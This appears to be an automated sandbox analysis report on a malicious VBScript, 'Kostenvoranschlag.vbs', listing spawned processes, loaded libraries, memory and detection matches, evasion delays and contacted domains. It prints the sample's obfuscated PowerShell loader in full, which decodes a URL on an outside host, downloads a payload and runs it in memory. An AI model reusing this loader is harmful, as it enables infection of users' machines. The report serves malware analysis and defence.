Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((wigans $Djiboutieres $Unrobustness), (Trmnds @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afhndende = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gimmerlams)), $Podosperm).DefineDynamicModule($Udsvejfninger, $false).DefineType($Helicteres, $Miljplaner, [System.MulticastDelegate])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACBA6F97 push esp; retf	4_2_00007FFAACBA6F98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACC716A1 pushad ; retf	4_2_00007FFAACC716C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAACC76855 push 30D00000h; retf	4_2_00007FFAACC7685A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_073B279D push esp; ret	13_2_073B27A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6541	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3292	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7586	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2207	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior

Source: powershell.exe, 00000004.00000002.1461760527.000001677BED3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWkk%SystemRoot%\system32\mswsock.dllsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane
Source: wscript.exe, 00000000.00000003.1259503516.000001E15F31F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
Source: PING.EXE, 00000002.00000002.1256963431.00000240627B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ

Source: Yara match	File source: amsi64_7400.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Name	IP	Active
hotelseneca.ro	185.181.240.15	true
Horm5zl_6637.6637.6637.657e	unknown	unknown
www.hotelseneca.ro	unknown	unknown

ID:	1541205
Product:	CloudBasic
Start time:	15:19:07
Start date:	24.10.2024
Sample:	Kostenvoranschlag.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	080a163f1709fc1834429846644abf60
SHA1:	998d9f5a1e0c00788d623cec753e34180135eb0c
SHA256:	50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
